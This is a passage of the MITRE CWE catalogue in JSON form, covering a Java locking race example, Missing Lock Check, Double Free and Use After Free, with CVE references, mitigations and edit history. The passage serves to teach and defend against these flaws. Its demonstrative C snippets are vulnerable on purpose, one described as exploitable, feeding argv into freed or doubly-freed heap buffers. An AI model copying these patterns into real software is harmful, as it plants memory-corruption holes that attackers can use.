threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = balance + amount;balance = newBalance;sufficientFundsCondition.signalAll();","xhtml:br":["","","","",""],"xhtml:i":"// inform other threads that funds are available"}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (balance &lt; amount) {}double newBalance = balance - amount;balance = newBalance;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sufficientFundsCondition.await();","xhtml:br":["","","",""],"xhtml:i":["// temporarily unblock access","// until sufficient funds are available"]}},"xhtml:br":["","",""]}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}}],"Body_Text":["However, the deposit and withdraw methods have shared access to the account balance private class variable. This can result in a race condition if multiple threads attempt to call the deposit and withdraw methods simultaneously where the account balance is modified by one thread before another thread has completed modifying the account balance. For example, if a thread attempts to withdraw funds using the withdraw method before another thread that is depositing funds using the deposit method completes the deposit then there may not be sufficient funds for the withdraw transaction.","To prevent multiple threads from having simultaneous access to the account balance variable the deposit and withdraw methods should be synchronized using the synchronized modifier.","An alternative solution is to use a lock object to ensure exclusive access to the bank account balance variable. As shown below, the deposit and withdraw methods use the lock object to set a lock to block access to the BankAccount object from other threads until the method has completed updating the bank account balance variable."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Locking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":{"#text":"Insufficient Resource Locking","attr":{"@_Date":"2010-09-27"}}}},"414":{"attr":{"@_ID":"414","@_Name":"Missing Lock Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product does not check to see if a lock is present before performing sensitive operations on a resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement a reliable lock mechanism."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1056","Description":"Product does not properly check if a lock is present, allowing other attackers to access functionality.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1056"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Lock Check"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"415":{"attr":{"@_ID":"415","@_Name":"Double Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.","Extended_Description":"When a program calls free() twice with the same argument, the program\'s memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1341","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Double-free"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once."},{"Phase":"Implementation","Description":"Use a static analysis tool to find double free instances."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code shows a simple example of a double free vulnerability.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"While contrived, this code should be exploitable on Linux distributions which do not ship with heap-chunk check summing turned on.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;#define BUFSIZE1 512#define BUFSIZE2 ((BUFSIZE1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf1R2;buf1R1 = (char *) malloc(BUFSIZE2);buf2R1 = (char *) malloc(BUFSIZE2);free(buf1R1);free(buf2R1);buf1R2 = (char *) malloc(BUFSIZE1);strncpy(buf1R2, argv[1], BUFSIZE1-1);free(buf2R1);free(buf1R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""]}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0642","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0642"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"},{"Reference":"CVE-2005-1689","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1689"},{"Reference":"CVE-2003-0545","Description":"Double free from invalid ASN.1 encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545"},{"Reference":"CVE-2003-1048","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048"},{"Reference":"CVE-2005-0891","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0891"},{"Reference":"CVE-2002-0059","Description":"Double free from malformed compressed data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0059"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DFREE - Double-Free Vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Double Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Doubly freeing memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory exactly once"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Double Frees&#34;, Page 379"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"It could be argued that Double Free would be most appropriately located as a child of \\"Use after Free\\", but \\"Use\\" and \\"Release\\" are considered to be distinct operations within vulnerability theory, therefore this is more accurately \\"Release of a Resource after Expiration or Release\\", which doesn\'t exist yet.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"}]}},"416":{"attr":{"@_ID":"416","@_Name":"Use After Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Stable"},"Description":"Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.","Extended_Description":{"xhtml:p":["The use of previously-freed memory can have any number of adverse consequences, ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw. The simplest way data corruption may occur involves the system\'s reuse of the freed memory. Use-after-free errors have two common and sometimes overlapping causes:","In this scenario, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process.","If the newly allocated data chances to hold a class, in C++ for example, various function pointers may be scattered within the heap data. If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for freeing the memory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Dangling pointer"},{"Term":"Use-After-Free"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"The use of previously freed memory may corrupt valid data, if the memory area in question has been allocated and used properly elsewhere."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If chunk consolidation occurs after the use of previously freed data, the process may crash when invalid data is used as chunk information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If malicious data is entered before chunk consolidation can take place, it may be possible to take advantage of a write-what-where primitive to execute arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;#define BUFSIZER1 512#define BUFSIZER2 ((BUFSIZER1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf2R2;char *buf3R2;buf1R1 = (char *) malloc(BUFSIZER1);buf2R1 = (char *) malloc(BUFSIZER1);free(buf2R1);buf2R2 = (char *) malloc(BUFSIZER2);buf3R2 = (char *) malloc(BUFSIZER2);strncpy(buf2R1, argv[1], BUFSIZER1-1);free(buf1R1);free(buf2R2);free(buf3R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""]}}}},{"Intro_Text":"The following code illustrates a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4168","Description":"Use-after-free triggered by closing a connection while data is still being transmitted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4168"},{"Reference":"CVE-2010-2941","Description":"Improper allocation for invalid data leads to use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941"},{"Reference":"CVE-2010-2547","Description":"certificate with a large number of Subject Alternate Names not properly handled in realloc, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2547"},{"Reference":"CVE-2010-1772","Description":"Timers are not disabled when a related object is deleted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1772"},{"Reference":"CVE-2010-1437","Description":"Access to a \\"dead\\" object that is being cleaned up","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437"},{"Reference":"CVE-2010-1208","Description":"object is deleted even with a non-zero reference count, and later accessed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1208"},{"Reference":"CVE-2010-0629","Description":"use-after-free involving request containing an invalid version number","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629"},{"Reference":"CVE-2010-0378","Description":"unload of an object that is currently being accessed by other functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0378"},{"Reference":"CVE-2010-0302","Description":"incorrectly tracking a reference count leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0302"},{"Reference":"CVE-2010-0249","Description":"use-after-free related to use of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249"},{"Reference":"CVE-2010-0050","Description":"HTML document with incorrectly-nested tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0050"},{"Reference":"CVE-2009-3658","Description":"Use after free in ActiveX object by providing a malformed argument to a method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3658"},{"Reference":"CVE-2009-3616","Description":"use-after-free by disconnecting during data transfer, or a message containing incorrect data types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3616"},{"Reference":"CVE-2009-3553","Description":"disconnect during a large data transfer causes incorrect reference count, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-2416","Description":"use-after-free found by fuzzing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416"},{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2009-0749","Description":"realloc generates new buffer and pointer, but previous pointer is still retained, leading to use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0749"},{"Reference":"CVE-2010-3328","Description":"Use-after-free in web browser, probably resultant from not initializing memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328"},{"Reference":"CVE-2008-5038","Description":"use-after-free when one thread accessed memory that was freed by another thread","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5038"},{"Reference":"CVE-2008-0077","Description":"assignment of malformed values to certain properties triggers use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077"},{"Reference":"CVE-2006-4434","Description":"mail server does not properly handle a long header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4434"},{"Reference":"CVE-2010-2753","Description":"chain: integer overflow leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2006-4997","Description":"freed pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Use After Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using freed memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated 